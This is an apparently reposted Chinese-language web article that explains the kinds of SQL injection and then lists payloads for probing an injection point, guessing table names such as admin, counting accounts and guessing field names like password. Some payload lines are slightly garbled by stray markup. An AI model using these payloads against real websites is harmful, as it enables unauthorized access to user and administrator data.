...">
瀏覽量:145次
sql注入語句是怎樣的呢?下面就讓我們一起來了解一下吧:
sql注入語句其實可以分為三種的,即數(shù)字型注入點,語句一般是“select * from表名where id=1 and 1=1”;字符型注入點,語句一般是“select * from表名where name...”;搜索型注入點。
而sql注入也就是通過將SQL命令插入到Web表單提交或是輸入域名、頁面請求的查詢字符串,最終可以達到欺騙服務器執(zhí)行惡意的SQL命令。
sql注入類型通常是可以按照不同方式進行分類的,比如若是按照注入點類型來進行分類可以分為數(shù)字型注入點、字符型注入點、搜索型注入點,若是按照數(shù)據(jù)提交的方式來分類,可以分為GET 注入、POST 注入、Cookie 注入、HTTP 頭部注入。
當然也可以按照執(zhí)行效果來分類,可以分為基于布爾的盲注、基于時間的盲注、基于報錯注入、聯(lián)合查詢注入。
其中常用的語句有:
1、判斷有無注入點
; and 1=1 and 1=2
2、猜表 通常表的名稱基本上是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判斷是否存在admin這張表
3、猜帳號數(shù)目 若是遇到0< 返回正確頁面 1<返回錯誤頁面那么就說明帳號數(shù)目就是1個
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4、猜解字段名稱 在len()括號里面可以加上所想到的字段名稱。
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(用戶字段名稱name)>0)
and 1=(select count(*) from admin where len(_blank>密碼字段名稱password)>0)
[聲明]本網(wǎng)轉載網(wǎng)絡媒體稿件是為了傳播更多的信息,此類稿件不代表本網(wǎng)觀點,本網(wǎng)不承擔此類稿件侵權行為的連帶責任。故此,如果您發(fā)現(xiàn)本網(wǎng)站的內容侵犯了您的版權,請您的相關內容發(fā)至此郵箱【779898168@qq.com】,我們在確認后,會立即刪除,保證您的版權。
官網(wǎng)優(yōu)化
整站優(yōu)化
渠道代理
400-655-5776